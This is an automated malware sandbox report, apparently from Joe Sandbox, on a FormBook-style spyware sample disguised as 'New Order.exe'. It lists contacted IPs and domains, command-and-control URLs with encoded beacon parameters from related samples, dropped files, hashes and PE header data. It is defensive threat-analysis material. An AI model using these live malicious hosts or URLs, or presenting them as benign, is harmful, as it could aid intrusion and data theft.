                                                                                                                            154.70.82.246
                                                                                                                            conseilnsaftogo.orgTogo
                                                                                                                            30982CAFENETTGtrue
                                                                                                                            154.90.35.240
                                                                                                                            all.wjscdn.comSeychelles
                                                                                                                            40065CNSERVERSUStrue
                                                                                                                            208.91.197.27
                                                                                                                            www.614genetics.onlineVirgin Islands (BRITISH)
                                                                                                                            40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                            154.23.184.95
                                                                                                                            hm35s.topUnited States
                                                                                                                            174COGENT-174UStrue
                                                                                                                            172.104.82.74
                                                                                                                            funnystory.onlineUnited States
                                                                                                                            63949LINODE-APLinodeLLCUStrue
                                                                                                                            172.104.18.233
                                                                                                                            gravendeel.studioUnited States
                                                                                                                            63949LINODE-APLinodeLLCUStrue
                                                                                                                            85.159.66.93
                                                                                                                            natroredirect.natrocdn.comTurkey
                                                                                                                            34619CIZGITRfalse
                                                                                                                            31.31.196.17
                                                                                                                            www.bootleggersrt.onlineRussian Federation
                                                                                                                            197695AS-REGRUtrue
                                                                                                                            68.66.226.92
                                                                                                                            www.717hy.netUnited States
                                                                                                                            55293A2HOSTINGUStrue
                                                                                                                            173.236.199.97
                                                                                                                            www.kvsj.netUnited States
                                                                                                                            26347DREAMHOST-ASUStrue
                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1567406
                                                                                                                            Start date and time:2024-12-03 14:36:48 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 11m 10s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:18
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:2
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:New Order.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@12/7@20/13
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 75%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 93%
                                                                                                                            • Number of executed functions: 94
                                                                                                                            • Number of non-executed functions: 290
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 20.190.147.3, 20.190.177.20, 20.190.177.84, 20.190.147.11, 20.190.147.12, 20.190.177.83, 20.190.177.23, 20.190.177.85
                                                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, login.live.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • VT rate limit hit for: New Order.exe
                                                                                                                            TimeTypeDescription
                                                                                                                            08:37:43API Interceptor1x Sleep call for process: New Order.exe modified
                                                                                                                            08:37:45API Interceptor17x Sleep call for process: powershell.exe modified
                                                                                                                            08:38:53API Interceptor8619528x Sleep call for process: w32tm.exe modified
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            130.185.109.77need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.lgdiamonds.info/cv1w/
                                                                                                                            MaMsKRmgXZ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • www.holzleisten24.shop/ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP
                                                                                                                            Product24573.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.berlinhealthweek.com/bpg5/?ti-8=LyKdFPBKAe5W&5eb6=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA==
                                                                                                                            Siirtokuitti_006703.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • www.printmyride.store/tchg/?O0qEM=QQ6dpIpAk027UR3BL5U7sG0DxH6sKQa5YnzY0agrXpda3w5URJfAhsqjtJqbY2/M8fhrkTh6mIV7dbZQ8z6SYrdm6JILdk9Mfg==&CF1Ki=UnDuQcdCFs1MNsvY
                                                                                                                            P5348574_74676.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.berlinhealthweek.com/bpg5/?lpw7=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==&UZCu=zJfEuRXw-P
                                                                                                                            535276_86376.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.berlinhealthweek.com/bpg5/?yDcF=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&jdd=UX4BZm
                                                                                                                            Product_List.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.berlinhealthweek.com/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==
                                                                                                                            PS_231.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.berlinhealthweek.com/bpg5/?kyx=IT_WJ&HqE8Cy=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA==
                                                                                                                            KD_MEDICAL_POLSKA_23053371.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • www.die-cyber-versicherer.com/co9t/?LVuSGU=-giyq0&MGuik=O0wiA489QXAo4/zisxW0kKpRL90vV9sT3USeBzF+d48ZKZIeaBWCTOAUxMvYVu20Q54TxHeRRe+2rSLSyytqRGlmgBV+voPflw==
                                                                                                                            s4YvlK74zJ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • www.die-cyber-versicherer.com/co9t/?h1=O0wiA489QXAo4/zisxW0kKpRL90vV9sT3USeBzF+d48ZKZIeaBWCTOAUxMvYVu20Q54TxHeRRe+2rSLSyytqRGlmgBV+voPflw==&m8hK_F=yFTUihtd4y
                                                                                                                            13.248.169.48SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.egyshare.xyz/440l/
                                                                                                                            attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.aktmarket.xyz/wb7v/
                                                                                                                            YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.tals.xyz/k1td/
                                                                                                                            Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.optimismbank.xyz/98j3/
                                                                                                                            lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.avalanchefi.xyz/ctta/
                                                                                                                            BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.tals.xyz/k1td/
                                                                                                                            PAYMENT_ADVICE.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.heliopsis.xyz/69zn/
                                                                                                                            1k24tbb-00241346.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                            • www.gupiao.bet/t3a1/
                                                                                                                            Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                            • www.hasan.cloud/tur7/
                                                                                                                            CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.egyshare.xyz/lp5b/
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            all.wjscdn.comTNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                                                                                            • 38.54.112.227
                                                                                                                            Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 154.205.159.116
                                                                                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 38.54.112.227
                                                                                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 154.90.58.209
                                                                                                                            natroredirect.natrocdn.comspecification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                            • 85.159.66.93
                                                                                                                            CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.159.66.93
                                                                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.159.66.93
                                                                                                                            TNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.159.66.93
                                                                                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.159.66.93
                                                                                                                            REQUESTING FOR UPDATED SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.159.66.93
                                                                                                                            Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.159.66.93
                                                                                                                            Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.159.66.93
                                                                                                                            packing list G25469.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.159.66.93
                                                                                                                            purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 85.159.66.93
                                                                                                                            www.aiactor.xyzDOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                                                                            • 13.248.169.48
                                                                                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 13.248.169.48
                                                                                                                            www.lgdiamonds.infoneed quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 130.185.109.77
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            AMAZON-02USSW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 13.248.169.48
                                                                                                                            New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 54.179.173.60
                                                                                                                            0200011080.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                            • 54.150.207.131
                                                                                                                            NOTIFICATION_OF_DEPENDANTS.vbsGet hashmaliciousUnknownBrowse
                                                                                                                            • 108.158.75.92
                                                                                                                            https://nam05.safelinks.protection.outlook.com.url.atp-redirect.protected-forms.com/XTnQrajg1OGVHZkdSZC9jY09NbW40Z2plNHVuWDhsQVZRZkFYNVBxOWlTekFXSXBLSVRWLyt2WXhuS1hGNVo3UUxGQTRLRVpXNHpLSjVKdDEvbHJLSmtFWjMzbFIxb3IvR2xvdWJ1em5yeTJBK1FXdzF3UG52YXBaVmJBSEJZcXBSdjFvMTh6TmplRHV4azZ6UHkrTnM5dUY2QmVzbVFVRWk5di9PMEZxZ2lXNnM5N2tuOExqN1pyUy0tcEx5Q0xXTTBEOURyNFdnTS0tTTJJM3JGT2w2ZzQxTnorb2NMd1lrZz09?cid=2305347406Get hashmaliciousKnowBe4Browse
                                                                                                                            • 13.227.8.37
                                                                                                                            https://chargeview.liveGet hashmaliciousUnknownBrowse
                                                                                                                            • 3.122.217.79
                                                                                                                            a-r.m-6.SNOOPY.elfGet hashmaliciousGafgytBrowse
                                                                                                                            • 54.171.230.55
                                                                                                                            phish_alert_sp2_2.0.0.0 (8).emlGet hashmaliciousUnknownBrowse
                                                                                                                            • 54.231.135.120
                                                                                                                            https://searchandprint.recipesGet hashmaliciousUnknownBrowse
                                                                                                                            • 108.158.75.111
                                                                                                                            https://es.vecteezy.com/arte-vectorial/20279878-kyd-letra-logo-diseno-en-blanco-antecedentes-kyd-creativo-circulo-letra-logo-concepto-kyd-letra-disenoGet hashmaliciousUnknownBrowse
                                                                                                                            • 52.19.224.221
                                                                                                                            ACPCAyMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                                                                                            • 162.55.60.2
                                                                                                                            la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 162.55.163.242
                                                                                                                            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                            • 162.10.135.213
                                                                                                                            x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                            • 162.52.132.181
                                                                                                                            la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 162.48.192.235
                                                                                                                            sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 162.64.49.53
                                                                                                                            loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 162.36.86.178
                                                                                                                            i586.elfGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.64.13.162
                                                                                                                            sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 162.60.248.105
                                                                                                                            loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 162.54.149.125
                                                                                                                            XIRRADEneed quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 130.185.109.77
                                                                                                                            file.exeGet hashmaliciousSystemBCBrowse
                                                                                                                            • 185.169.24.192
                                                                                                                            Zam#U00f3wienie Z2300056_pdf .scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                            • 185.169.24.118
                                                                                                                            New order -24900242 OP_pdf .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                            • 185.169.24.118
                                                                                                                            vAZYIEQMP8.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                            • 195.138.242.157
                                                                                                                            MaMsKRmgXZ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 130.185.109.77
                                                                                                                            Product24573.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 130.185.109.77
                                                                                                                            Siirtokuitti_006703.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 130.185.109.77
                                                                                                                            P5348574_74676.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 130.185.109.77
                                                                                                                            Product7825.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • 130.185.109.77
                                                                                                                            No context
                                                                                                                            No context
                                                                                                                            Process:C:\Users\user\Desktop\New Order.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1216
                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                            Malicious:true
                                                                                                                            Reputation:high, very likely benign file
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1172
                                                                                                                            Entropy (8bit):5.354777075714867
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:3gWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:QWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                                                                                            MD5:92C17FC0DE8449D1E50ED56DBEBAA35D
                                                                                                                            SHA1:A617D392757DC7B1BEF28448B72CBD131CF4D0FB
                                                                                                                            SHA-256:DA2D2B57AFF1C99E62DD8102CF4DB3F2F0621D687D275BFAF3DB77772131E485
                                                                                                                            SHA-512:603922B790E772A480C9BF4CFD621827085B0070131EF29DC283F0E901CF783034384F8815C092D79A6EA5DF382EF78AF5AC3D81EBD118D2D5C1E623CE5553D1
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                            Process:C:\Windows\SysWOW64\w32tm.exe
                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):196608
                                                                                                                            Entropy (8bit):1.1239949490932863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                            MD5:271D5F995996735B01672CF227C81C17
                                                                                                                            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                            Malicious:false
                                                                                                                            Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Entropy (8bit):7.80512033123719
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                            File name:New Order.exe
                                                                                                                            File size:764'928 bytes
                                                                                                                            MD5:8ef36959a2cedc10c4c6036c2360e105
                                                                                                                            SHA1:96c17b47e3bbcd645fdf24b3a7b3319848fb62ed
                                                                                                                            SHA256:c8e6b3d94513f697d73e00d43476dddd0abdaf8d5cc6954a1218571dbccec61e
                                                                                                                            SHA512:e29fd3578698f5092c74d5a4d1fb46507baaa09b5a0360d08ef02e67bcca7aa41318be0ba6bb30a81216e4c05ed7bdee45500fe346a13d60debeb76516256035
                                                                                                                            SSDEEP:12288:tIR4R52J+Xtwg8SONPyA3RQgiP9nBdQyPieztFKN0fpEzPjQT12Yi2ktQfj9qI5w:tIeeCY5hvyPicFruzP8T1pipaf8I4
                                                                                                                            TLSH:90F4124C1A5BE817CB8657340EB2F2B8167C2FDEE90092178FCDADEBF9399245E44185
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....pNg..............0..T...T......Rp... ........@.. ....................................@................................
                                                                                                                            Icon Hash:033424c4c199d839
                                                                                                                            Entrypoint:0x4b7052
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x674E70A1 [Tue Dec 3 02:44:49 2024 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                            Instruction
                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
